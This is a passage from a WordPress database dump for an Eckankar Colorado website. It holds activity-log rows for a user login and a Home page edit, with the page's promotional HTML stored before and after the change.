Firefox/118.0'),(227336,38204,'_message_key','user_logged_in'),(227337,38204,'_server_remote_addr','76.130.120.x'),(227338,38204,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(227339,38205,'post_id','7160'),(227340,38205,'post_type','page'),(227341,38205,'post_title','Home'),(227342,38205,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Open Sans\'; font-size: 30px; color: #1e63bc; font-weight: 500;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"500\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Are you looking for a deeper, more personal connection with God and Divine Spirit?<br>\r\nEckankar, the Path of Spiritual Freedom, can help you fulfill that dream.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The events below can help you see beyond the surface of day-to-day life so you can <br>\r\nexperience the joy of Soul—your true self. Each awakens you to more of the love, wisdom, and creative powers already in your heart.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 30px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 30px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/Vqi2UUMgpAM[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; line-height: 22px; margin-top: 16px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; line-height: 23px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img bg-img-rounded-bottom-left bg-img-rounded-top-right\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img wp-image-268201 size-full aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 15px; color: #333333;\">(Member Newsletter Subscriptions<br>\r\nAre Available In The <a href=\"https://eckankar-colorado.org/members-page/\">Members Area</a>)</p>\r\n<p style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(227343,38205,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Open Sans\'; font-size: 30px; color: #1e63bc; font-weight: 500;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"500\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Are you looking for a deeper, more personal connection with God and Divine Spirit?<br>\r\nEckankar, the Path of Spiritual Freedom, can help you fulfill that dream.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The events below can help you see beyond the surface of day-to-day life so you can <br>\r\nexperience the joy of Soul—your true self. Each awakens you to more of the love, wisdom, and creative powers already in your heart.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 30px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 30px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; 